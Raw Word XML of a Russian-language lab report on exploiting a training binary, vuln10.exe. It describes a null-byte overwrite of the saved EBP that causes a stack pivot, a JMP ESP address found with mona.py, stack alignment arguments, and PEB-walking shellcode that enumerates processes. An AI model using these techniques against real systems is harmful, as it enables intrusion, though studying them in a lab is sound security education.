          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00194F47" w:rsidRPr="009C4665">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00194F47" w:rsidRPr="009C4665">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00194F47" w:rsidRPr="009C4665">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> нашел </w:t>
      </w:r>
      <w:r w:rsidR="00194F47">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>исполняемый файл (vuln</w:t>
      </w:r>
      <w:r w:rsidR="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.exe) и</w:t>
      </w:r>
      <w:r w:rsidR="00194F47" w:rsidRPr="009C4665">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5 библиотек (KERNELBASE.DLL, KERNEL32.DLL, msvcrt.dll, ntdll.dll и func.dll).</w:t>
      </w:r>
      <w:r w:rsidR="00B92788" w:rsidRPr="00B92788">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B92788">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Кроме того,</w:t>
      </w:r>
      <w:r w:rsidR="00194F47">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00194F47">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00194F47" w:rsidRPr="005C6AFA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00194F47">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00194F47" w:rsidRPr="005C6AFA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00194F47">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">не является </w:t>
      </w:r>
      <w:r w:rsidR="00B92788">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">системной библиотекой </w:t>
      </w:r>
      <w:r w:rsidR="00194F47">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00B92788">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00194F47">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">не </w:t>
      </w:r>
      <w:r w:rsidR="00C92B9E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>использует те защит</w:t>
      </w:r>
      <w:r w:rsidR="00035C36">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ных механизмов, по крайней мере представленных. </w:t>
      </w:r>
      <w:r w:rsidR="00E06C9D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Также отсутствует защита </w:t>
      </w:r>
      <w:r w:rsidR="00E06C9D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r w:rsidR="00E06C9D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, это </w:t>
      </w:r>
      <w:r w:rsidR="0067413D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">можно обнаружить увидев, что флаг </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0067413D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NXCompat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0067413D" w:rsidRPr="0067413D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F440D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>не выставлен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D6616" w14:textId="1CB0C914" w:rsidR="00194F47" w:rsidRDefault="00194F47" w:rsidP="00B92788">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28199694" w14:textId="1A7CF2DA" w:rsidR="00E700AD" w:rsidRDefault="00E700AD" w:rsidP="006426CC">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E700AD">
        <w:t>Опкоды</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E700AD">
        <w:t xml:space="preserve"> инструкций, необходимых для передачи управления на полезную нагрузку</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C59E8E" w14:textId="5135C713" w:rsidR="007B7F85" w:rsidRDefault="007B7F85" w:rsidP="00A32BF3">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B7F85">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7F85">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> нужно найти места возвращения адреса текущей инструкции на стек (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B7F85">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B7F85">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B7F85">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A1028C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7F85">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04944860" w14:textId="6152B874" w:rsidR="009E2AE8" w:rsidRPr="005B3DBE" w:rsidRDefault="009E2AE8" w:rsidP="00A32BF3">
      <w:pPr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поиска </w:t>
      </w:r>
      <w:r w:rsidR="00012568">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">также использовалась </w:t>
      </w:r>
      <w:r w:rsidR="00012568">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidR="00012568" w:rsidRPr="00012568">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012568">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00012568">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, команда </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012568" w:rsidRPr="00012568">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00012568" w:rsidRPr="00012568">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -r </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012568" w:rsidRPr="00012568">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00012568" w:rsidRPr="00012568">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -m func.dll</w:t>
      </w:r>
      <w:r w:rsidR="005B3DBE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40994D96" w14:textId="7E20C7E3" w:rsidR="009E2AE8" w:rsidRDefault="00997D58" w:rsidP="00A32BF3">
      <w:pPr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Каждая из найденных инструкций</w:t>
      </w:r>
      <w:r w:rsidR="00BC2A59">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> представлена </w:t>
      </w:r>
      <w:r w:rsidR="00F4070D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">на </w:t>
      </w:r>
      <w:r w:rsidR="004911EC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="004911EC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref225704031 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004911EC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="004911EC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006E1CC0">
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidR="004911EC" w:rsidRPr="00F4070D">
        <w:t>исун</w:t>
      </w:r>
      <w:r w:rsidR="004911EC">
        <w:t>ке</w:t>
      </w:r>
      <w:r w:rsidR="004911EC" w:rsidRPr="00F4070D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004911EC" w:rsidRPr="00F4070D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004911EC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006E1CC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AF2FF9" w14:textId="77777777" w:rsidR="00F4070D" w:rsidRDefault="00F4070D" w:rsidP="00F4070D">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r w:rsidRPr="00F4070D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1456E104" wp14:editId="4C605C34">
            <wp:extent cx="5940425" cy="2330803"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="452410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0212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F777" w14:textId="53017B80" w:rsidR="00F4070D" w:rsidRPr="00F4070D" w:rsidRDefault="00F4070D" w:rsidP="00F4070D">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Ref225704031"/>
      <w:r w:rsidRPr="00F4070D">
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Рисунок \* ARABIC ">
        <w:r w:rsidR="009627BF">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00F4070D">
        <w:t xml:space="preserve">- Список статических инструкций вида </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F4070D">
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F4070D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F4070D">
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E3EABD2" w14:textId="7C9BB178" w:rsidR="009E2AE8" w:rsidRPr="009B2C75" w:rsidRDefault="006E1CC0" w:rsidP="00A32BF3">
      <w:pPr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Учитывая</w:t>
      </w:r>
      <w:r w:rsidR="0005543F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, что для ка</w:t>
      </w:r>
      <w:r w:rsidR="009B2C75">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ждого адреса </w:t>
      </w:r>
      <w:r w:rsidR="009B2C75">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidR="009B2C75" w:rsidRPr="009B2C75">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B2C75">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">отключен, то мы </w:t>
      </w:r>
      <w:r w:rsidR="00574668">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">можем выбрать любой адрес из 10. Был выбран первый. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1F58C8" w14:textId="66907F8D" w:rsidR="009E2AE8" w:rsidRDefault="009E2AE8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B875EA" w14:textId="77777777" w:rsidR="009E2AE8" w:rsidRPr="007B7F85" w:rsidRDefault="009E2AE8" w:rsidP="00A32BF3">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7C2CE9" w14:textId="1254F8BC" w:rsidR="00C36498" w:rsidRDefault="00C36498" w:rsidP="006426CC">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00C36498">
        <w:t>Эксплуатация найденной уязвимости, с использованием полезной нагрузки (shellcode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2100243D" w14:textId="77777777" w:rsidR="00437F53" w:rsidRPr="00437F53" w:rsidRDefault="00437F53" w:rsidP="00437F53">
      <w:r w:rsidRPr="00437F53">
        <w:t>В ходе анализа исполняемого файла vuln10.exe было установлено, что программа имеет жесткую проверку на размер копируемых данных (лимит 2499 байт), что делает невозможным классическое переполнение буфера с прямой перезаписью адреса возврата (EIP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7B09D6" w14:textId="77777777" w:rsidR="00437F53" w:rsidRPr="00437F53" w:rsidRDefault="00437F53" w:rsidP="00437F53">
      <w:r w:rsidRPr="00437F53">
        <w:t xml:space="preserve">Однако в программе присутствует уязвимость типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>Arbitrary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>Null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>Write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:t xml:space="preserve"> (LSB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>Overwrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>). Из-за ошибки в индексации программа принудительно записывает нулевой байт по смещению 2510 (v4[2510] = 0). Это смещение попадает ровно на младший байт (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>Least</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>Significant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>Byte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>) сохраненного регистра EBP на стеке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143509C5" w14:textId="77777777" w:rsidR="00437F53" w:rsidRPr="00437F53" w:rsidRDefault="00437F53" w:rsidP="00437F53">
      <w:r w:rsidRPr="00437F53">
        <w:t xml:space="preserve">При завершении функции выполняется эпилог (инструкции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>leave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>ret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:t xml:space="preserve">). Инструкция </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>leave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:t xml:space="preserve"> копирует значение поврежденного EBP в ESP. Из-за зануления младшего байта стек "сдвигается" (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>Pivoting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:t>) на определенное количество байт назад, попадая внутрь нашего контролируемого буфера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1276F41A" w14:textId="41D84084" w:rsidR="00803101" w:rsidRPr="00E608CF" w:rsidRDefault="00437F53" w:rsidP="00437F53">
      <w:r w:rsidRPr="00437F53">
        <w:t>Для надежной эксплуатации в буфер помеща</w:t>
      </w:r>
      <w:r>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:t>тся последовательность адресов инструкции RET из модуля func.dll, котор</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ая доводит </w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:t xml:space="preserve">выполнение до </w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:lastRenderedPageBreak/>
        <w:t>инструкции JMP ESP, после чего управление передается нашему шелл-коду через обратный прыжок (JMP). В связи с тем, что переменные среды могут влиять на точное расположение стека, для гарантированного срабатывания эксплойта программе при запуске передаются дополнительные мусорные аргументы командной строки (например, .</w:t>
      </w:r>
      <w:r w:rsidR="009627BF" w:rsidRPr="009627BF">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:t>vuln10.exe AAAAA), которые выравнивают стек в нужную позицию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B8ABFA" w14:textId="77777777" w:rsidR="006D6D39" w:rsidRDefault="006D6D39" w:rsidP="00923DD7"/>
    <w:p w14:paraId="321E5477" w14:textId="3972DC6A" w:rsidR="00B5374B" w:rsidRDefault="00B5374B" w:rsidP="00B5374B">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Написание шелл кода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7BB39B" w14:textId="77777777" w:rsidR="00437F53" w:rsidRPr="00437F53" w:rsidRDefault="00437F53" w:rsidP="00437F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">В десятом варианте необходимо получить список запущенных процессов и их разрядность. Для этого используются функции Windows API из библиотеки </w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">kernel32.dll: CreateToolhelp32Snapshot, Process32First, Process32Next, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OpenProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>IsWow64Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A63C6A" w14:textId="5F09A22B" w:rsidR="00437F53" w:rsidRPr="00437F53" w:rsidRDefault="00437F53" w:rsidP="00437F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Базовый </w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">адрес kernel32.dll находится динамически через парсинг структуры PEB (Process Environment Block) и </w:t>
      </w:r>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PEB_LDR_DATA</w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Найдя таблицу экспорта, шелл-код</w:t>
      </w:r>
      <w:r w:rsidR="009627BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> итеративно по названию </w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">находит адрес функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>GetProcAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009627BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00437F53">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> с помощью которой затем подгружаются остальные необходимые функции.</w:t>
      </w:r>
